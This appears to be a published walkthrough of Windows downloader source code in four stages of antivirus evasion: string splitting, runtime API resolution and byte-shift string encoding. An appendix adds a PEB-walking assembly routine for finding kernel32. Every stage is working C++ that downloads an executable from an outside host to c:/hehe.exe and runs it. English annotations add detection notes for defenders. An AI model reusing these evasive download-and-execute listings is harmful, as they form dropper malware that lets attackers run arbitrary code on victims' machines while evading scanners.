window技术

// Stage 1 of a four-stage walkthrough; the Chinese marker on this line reads
// "Windows downloader source, AV evasion: basic level".
// What the code does: URLDownloadToFileA() fetches http://downmini.kugou.com/kugou7695.exe
// into the fixed path c:/hehe.exe, then ShellExecuteA(NULL,"open",c:/hehe.exe,...) launches it.
// The only evasion at this stage is spelling the URL, the path and the verb as char-by-char
// arrays so they do not show up in a plain strings dump; urlmon.lib is still linked statically
// (#pragma comment) and URLDownloadToFileA/ShellExecuteA remain visible in the import table.
// Defender notes: a non-browser binary importing URLDownloadToFileA, a file written to
// c:/hehe.exe and then executed, and egress to the host above are the observable signals.
// The listing is kept collapsed exactly as published.
#include <iostream>#include <Windows.h>#include <string>using namespace std;#pragma comment(lib,"urlmon.lib")//window下载者源码免杀之初级免杀int main( int argc, char* argv[] ){char http_$$downmini_kugou_com$kugou7695_exe[]={'h','t','t','p',':','/','/','d','o','w','n','m','i','n','i','.','k','u','g','o','u','.','c','o','m','/','k','u','g','o','u','7','6','9','5','.','e','x','e','\0'};char c_$hehe_exe[]={'c',':','/','h','e','h','e','.','e','x','e','\0'};char open[]={'o','p','e','n','\0'};URLDownloadToFileA(0,http_$$downmini_kugou_com$kugou7695_exe,c_$hehe_exe,0,NULL);ShellExecuteA(NULL,open,c_$hehe_exe,"","",SW_SHOW);return 0;}
// Stage 2 ("intermediate level" in the Chinese marker). Same behaviour as stage 1 — download
// to c:/hehe.exe, then ShellExecuteA "open" — but the two APIs are now resolved at start-up
// through GetProcAddress(LoadLibraryA("Urlmon.dll"),"URLDownloadToFileA") and
// GetProcAddress(LoadLibraryA("shell32.dll"),"ShellExecuteA") into function-pointer globals,
// so neither name appears in the PE import table. The URL decodes to
// http://dlsw.baidu.com/sw-search-sp/soft/37/11063/7z_V9.38.0.0_setup.1421654581.exe (a 7-Zip
// installer served by Baidu's download portal); the original kugou URL is left commented out.
// UNICODEconvertANSI()/ANSIConvertUNCOIDE() are unused WideCharToMultiByte/MultiByteToWideChar
// helpers that return new[]-allocated buffers; the commented wide string inside reads
// "wide-char conversion example!OK!". Nothing in main() frees or calls them.
// Defender notes: the binary now only imports LoadLibraryA/GetProcAddress from kernel32 while
// loading urlmon.dll and shell32.dll at runtime; the download-write-execute sequence on
// c:/hehe.exe is unchanged, so behavioural detection sees stage 1 and stage 2 identically.
// The listing is kept collapsed exactly as published.
#include <iostream>#include <Windows.h>#include <string>using namespace std;typedef UINT (WINAPI *URLDownloadToFileAT)(LPUNKNOWN,LPCSTR,LPCSTR,DWORD,LPBINDSTATUSCALLBACK); URLDownloadToFileAT pURLDownloadToFileA = (URLDownloadToFileAT)GetProcAddress(LoadLibraryA("Urlmon.dll"),"URLDownloadToFileA");typedef HINSTANCE (WINAPI *ShellExecuteAT)(__in_opt HWND hwnd, __in_opt LPCSTR lpOperation, __in LPCSTR lpFile, __in_opt LPCSTR lpParameters,__in_opt LPCSTR lpDirectory, __in INT nShowCmd);ShellExecuteAT pShellExecuteA = (ShellExecuteAT)GetProcAddress(LoadLibraryA("shell32.dll"),"ShellExecuteA");char *UNICODEconvertANSI(LPWSTR wText,int targetCodePage){//wchar_t wText[20] = {L"宽字符转换实例!OK!"};int dwNum = WideCharToMultiByte(targetCodePage,NULL,wText,-1,NULL,0,NULL,FALSE);char *psText;psText = new char[dwNum+1];memset(psText,0,dwNum);WideCharToMultiByte (targetCodePage,NULL,wText,-1,psText,dwNum+1,NULL,FALSE);return psText;}LPWSTR ANSIConvertUNCOIDE(char* aText,int sourceCodePage){int len=MultiByteToWideChar(sourceCodePage,NULL,aText,-1,NULL,0);wchar_t *psText=new wchar_t[len+1];memset(psText,0,len);MultiByteToWideChar(sourceCodePage,NULL,aText,-1,psText,len+1);//psText[len]='\0';return psText;}//window下载者源码免杀之中级免杀 int main( int argc, char* argv[] ){//char http_$$downmini_kugou_com$kugou7695_exe[]={'h','t','t','p',':','/','/','d','o','w','n','m','i','n','i','.','k','u','g','o','u','.','c','o','m','/','k','u','g','o','u','7','6','9','5','.','e','x','e','\0'};char http_$$dlsw_baidu_co[]={'h','t','t','p',':','/','/','d','l','s','w','.','b','a','i','d','u','.','c','o','m','/','s','w','-','s','e','a','r','c','h','-','s','p','/','s','o','f','t','/','3','7','/','1','1','0','6','3','/','7','z','_','V','9','.','3','8','.','0','.','0','_','s','e','t','u','p','.','1','4','2','1','6','5','4','5','8','1','.','e','x','e','\0'};char c_$hehe_exe[]={'c',':','/','h','e','h','e','.','e','x','e','\0'};char 
open[]={'o','p','e','n','\0'};pURLDownloadToFileA(0,http_$$dlsw_baidu_co,c_$hehe_exe,0,NULL);pShellExecuteA(NULL,open,c_$hehe_exe,"","",SW_SHOW);return 0;}

// Stage 3 ("advanced dynamic level" in the Chinese marker). Behaviour is still identical:
// download the Baidu-hosted 7-Zip installer URL to c:/hehe.exe and ShellExecuteA "open" it.
// The change is that GetProcAddress and LoadLibraryA are themselves looked up by name
// (from char-by-char arrays) via the real GetProcAddress(LoadLibraryA("kernel32.dll"),...)
// during static initialisation, and every later DLL/API name (Urlmon.dll, URLDownloadToFileA,
// shell32.dll, ShellExecuteA) goes through those two resolved pointers. The two wide/narrow
// conversion helpers from stage 2 are carried along inside a /** ... */ block comment.
// Defender notes: the bootstrap still has to import kernel32!LoadLibraryA and
// kernel32!GetProcAddress, so an import table reduced to exactly those two entries, combined
// with runtime loads of urlmon.dll and shell32.dll, is itself a useful static heuristic; the
// file-write-then-execute of c:/hehe.exe is unchanged from stages 1 and 2.
// The listing is kept collapsed exactly as published.
#include <iostream>#include <Windows.h>#include <string>using namespace std;char kernel32_dll[]={'k','e','r','n','e','l','3','2','.','d','l','l','\0'};char bGetProcAddress[]={'G','e','t','P','r','o','c','A','d','d','r','e','s','s','\0'};typedef FARPROC (WINAPI *GetProcAddressT)(__in HMODULE hModule,__in LPCSTR lpProcName);GetProcAddressT pGetProcAddressT = (GetProcAddressT)GetProcAddress(LoadLibraryA(kernel32_dll),bGetProcAddress);char bLoadLibraryA[]={'L','o','a','d','L','i','b','r','a','r','y','A','\0'};typedef HMODULE (WINAPI *LoadLibraryAT)(__in LPCSTR lpLibFileName);LoadLibraryAT pLoadLibraryAT = (LoadLibraryAT)pGetProcAddressT(LoadLibraryA(kernel32_dll),bLoadLibraryA);char bURLDownloadToFileA[]={'U','R','L','D','o','w','n','l','o','a','d','T','o','F','i','l','e','A','\0'};char bUrlmon_dll[]={'U','r','l','m','o','n','.','d','l','l','\0'};typedef UINT (WINAPI *URLDownloadToFileAT)(LPUNKNOWN,LPCSTR,LPCSTR,DWORD,LPBINDSTATUSCALLBACK); URLDownloadToFileAT pURLDownloadToFileA = (URLDownloadToFileAT)pGetProcAddressT(pLoadLibraryAT(bUrlmon_dll),bURLDownloadToFileA);char bshell32_dll[]={'s','h','e','l','l','3','2','.','d','l','l','\0'};char bShellExecuteA[]={'S','h','e','l','l','E','x','e','c','u','t','e','A','\0'};typedef HINSTANCE (WINAPI *ShellExecuteAT)(__in_opt HWND hwnd, __in_opt LPCSTR lpOperation, __in LPCSTR lpFile, __in_opt LPCSTR lpParameters,__in_opt LPCSTR lpDirectory, __in INT nShowCmd);ShellExecuteAT pShellExecuteA = (ShellExecuteAT)pGetProcAddressT(pLoadLibraryAT(bshell32_dll),bShellExecuteA);/**char *UNICODEconvertANSI(LPWSTR wText,int targetCodePage){//wchar_t wText[20] = {L"宽字符转换实例!OK!"};int dwNum = WideCharToMultiByte(targetCodePage,NULL,wText,-1,NULL,0,NULL,FALSE);char *psText;psText = new char[dwNum+1];memset(psText,0,dwNum);WideCharToMultiByte (targetCodePage,NULL,wText,-1,psText,dwNum+1,NULL,FALSE);return psText;}LPWSTR ANSIConvertUNCOIDE(char* aText,int sourceCodePage){int len=MultiByteToWideChar(sourceCodePage,NULL,aText,-1,NULL,0);wchar_t 
*psText=new wchar_t[len+1];memset(psText,0,len);MultiByteToWideChar(sourceCodePage,NULL,aText,-1,psText,len+1);//psText[len]='\0';return psText;}*///window下载者源码免杀之高级动态免杀int main( int argc, char* argv[] ){//char http_$$downmini_kugou_com$kugou7695_exe[]={'h','t','t','p',':','/','/','d','o','w','n','m','i','n','i','.','k','u','g','o','u','.','c','o','m','/','k','u','g','o','u','7','6','9','5','.','e','x','e','\0'};char http_$$dlsw_baidu_co[]={'h','t','t','p',':','/','/','d','l','s','w','.','b','a','i','d','u','.','c','o','m','/','s','w','-','s','e','a','r','c','h','-','s','p','/','s','o','f','t','/','3','7','/','1','1','0','6','3','/','7','z','_','V','9','.','3','8','.','0','.','0','_','s','e','t','u','p','.','1','4','2','1','6','5','4','5','8','1','.','e','x','e','\0'};char c_$hehe_exe[]={'c',':','/','h','e','h','e','.','e','x','e','\0'};char open[]={'o','p','e','n','\0'};pURLDownloadToFileA(0,http_$$dlsw_baidu_co,c_$hehe_exe,0,NULL);pShellExecuteA(NULL,open,c_$hehe_exe,"","",SW_SHOW);return 0;}

// Stage 4 ("advanced-advanced dynamic level" in the Chinese marker). The Chinese header
// comment on DenCodeLen reads: "Encrypts the buffer in place; the length must be given, so
// the terminating '\0' can be covered too; calling it again decrypts." As written the
// function only ever subtracts 1 from each byte (dd = ch - 1), so it is a fixed -1 shift,
// not an involution: a second call does not restore the input. Every string in main() is
// stored pre-shifted by +1 and decoded just before use — 'l','f','s','o','f','m','4','3',
// '/','e','m','m' becomes kernel32.dll, the URL array becomes
// http://downmini.kugou.com/kugou7695.exe, 'd',';','0','i','f','i','f','/','f','y','f'
// becomes c:/hehe.exe and 'p','q','f','o' becomes open. Since strlen() is applied to the
// encoded arrays, the terminator itself is never encoded here.
// API resolution is the same GetProcAddress/LoadLibraryA bootstrap as stage 3, now with the
// typedefs and lookups moved inside main(); the download-to-c:/hehe.exe-then-ShellExecuteA
// behaviour is unchanged. The author links their own scan result at
// http://r.virscan.org/report/2f869d7f04d3a73a692ad861dc5cd892.
// Defender notes: the decoded API and DLL names exist in process memory right before each
// GetProcAddress/LoadLibraryA call, and the on-disk/network/process-creation behaviour is
// identical to the earlier stages — string shifting only defeats static string matching.
// The listing is kept collapsed exactly as published.
#include <iostream>#include <Windows.h>#include <string>using namespace std;//加密信息并输出,要指定长度,字串结尾'\0'也可以被加密。再次调用即解密。  void DenCodeLen(char* pStr,unsigned int len)  {  for(unsigned int i=0;i<len;i++)  {  char ch=pStr[i];char dd=ch-1;  pStr[i]=dd;}  } //查杀报告:http://r.virscan.org/report/2f869d7f04d3a73a692ad861dc5cd892//window下载者源码免杀之高高级动态免杀int main( int argc, char* argv[] ){char kernel32_dll[]={'l','f','s','o','f','m','4','3','/','e','m','m','\0'};//kernel32.dllDenCodeLen(kernel32_dll,strlen(kernel32_dll));char bGetProcAddress[]={'H','f','u','Q','s','p','d','B','e','e','s','f','t','t','\0'};DenCodeLen(bGetProcAddress,strlen(bGetProcAddress));typedef FARPROC (WINAPI *GetProcAddressT)(__in HMODULE hModule,__in LPCSTR lpProcName);GetProcAddressT pGetProcAddressT = (GetProcAddressT)GetProcAddress(LoadLibraryA(kernel32_dll),bGetProcAddress);char bLoadLibraryA[]={'M','p','b','e','M','j','c','s','b','s','z','B','\0'};DenCodeLen(bLoadLibraryA,strlen(bLoadLibraryA));typedef HMODULE (WINAPI *LoadLibraryAT)(__in LPCSTR lpLibFileName);LoadLibraryAT pLoadLibraryAT = (LoadLibraryAT)pGetProcAddressT(LoadLibraryA(kernel32_dll),bLoadLibraryA);char URLDownloadToFileA[]={'V','S','M','E','p','x','o','m','p','b','e','U','p','G','j','m','f','B','\0'};DenCodeLen(URLDownloadToFileA,strlen(URLDownloadToFileA));char Urlmon_dll[]={'V','s','m','n','p','o','/','e','m','m','\0'};DenCodeLen(Urlmon_dll,strlen(Urlmon_dll));typedef UINT (WINAPI *URLDownloadToFileAT)(LPUNKNOWN,LPCSTR,LPCSTR,DWORD,LPBINDSTATUSCALLBACK); URLDownloadToFileAT pURLDownloadToFileA = (URLDownloadToFileAT)pGetProcAddressT(pLoadLibraryAT(Urlmon_dll),URLDownloadToFileA);char shell32_dll[]={'t','i','f','m','m','4','3','/','e','m','m','\0'};DenCodeLen(shell32_dll,strlen(shell32_dll));char ShellExecuteA[]={'T','i','f','m','m','F','y','f','d','v','u','f','B','\0'};DenCodeLen(ShellExecuteA,strlen(ShellExecuteA));typedef HINSTANCE (WINAPI *ShellExecuteAT)(__in_opt HWND hwnd, __in_opt LPCSTR lpOperation, __in LPCSTR lpFile, __in_opt 
LPCSTR lpParameters,__in_opt LPCSTR lpDirectory, __in INT nShowCmd);ShellExecuteAT pShellExecuteA = (ShellExecuteAT)pGetProcAddressT(pLoadLibraryAT(shell32_dll),ShellExecuteA);//http://downmini.kugou.com/kugou7695.exechar http_$$downmini_kugo[]={'i','u','u','q',';','0','0','e','p','x','o','n','j','o','j','/','l','v','h','p','v','/','d','p','n','0','l','v','h','p','v','8','7',':','6','/','f','y','f','\0'};DenCodeLen(http_$$downmini_kugo,strlen(http_$$downmini_kugo));char c_$hehe_exe[]={'d',';','0','i','f','i','f','/','f','y','f','\0'};DenCodeLen(c_$hehe_exe,strlen(c_$hehe_exe));char open[]={'p','q','f','o','\0'};DenCodeLen(open,strlen(open));pURLDownloadToFileA(0,http_$$downmini_kugo,c_$hehe_exe,0,NULL);pShellExecuteA(NULL,open,c_$hehe_exe,"","",SW_SHOW);//char bShellExecuteA[]={'T','i','f','m','m','F','y','f','d','v','u','f','B','\0'};//DenCodeLen(bShellExecuteA,strlen(bShellExecuteA));//cout<<bShellExecuteA<<endl;return 0;}

// Appendix, credited to a pediy.com forum thread; the Chinese marker reads "a way to obtain
// the kernel32 base address that works on both Win7 and XP". It is not called by any of the
// four main() listings above.
// GetKernel32Addr() is MSVC x86 inline assembly (__asm, fs:[...] PEB access), so it is
// 32-bit only. It reads the PEB via fs:[0x30], follows the loader data pointer and one of
// its module lists, and walks entries until it finds one whose base-name buffer has a NUL
// at wide-char index 12 (cmp word ptr [edi+0x18],cx with cx==0), i.e. the first module with
// a 12-character name, then returns that entry's base (read from [esi+0x8]). On XP the
// second initialised module is kernel32.dll; the loop exists so that Win7's kernelbase.dll
// (14 characters) is skipped.
// Defender notes: this is the classic shellcode pattern for locating kernel32 with no
// imports at all, which is why scanners flag fs:[30h]-based PEB walks in user code; it
// relies on undocumented structure offsets and breaks if a different 12-character module
// precedes kernel32 in the list. The listing is kept collapsed exactly as published.
//http://bbs.pediy.com/showthread.php?t=122260&page=2//win7 xp 通用获取Kernel32Addr方法HMODULE GetKernel32Addr(){HMODULE dwKernel32Addr = 0;__asm{push ecxpush esipush edixor ecx,ecxmov esi,dword ptr fs:[ecx+0x30]mov esi,dword ptr ds:[esi+0x0C]mov esi,dword ptr ds:[esi+0x1C]next_module:mov eax,dword ptr ds:[esi+0x8]mov edi,dword ptr ds:[esi+0x20]mov esi,dword ptr ds:[esi]cmp word ptr ds:[edi+0x18],cxjnz short next_modulepop edipop esipop ecxmov dwKernel32Addr, eax}return dwKernel32Addr;}


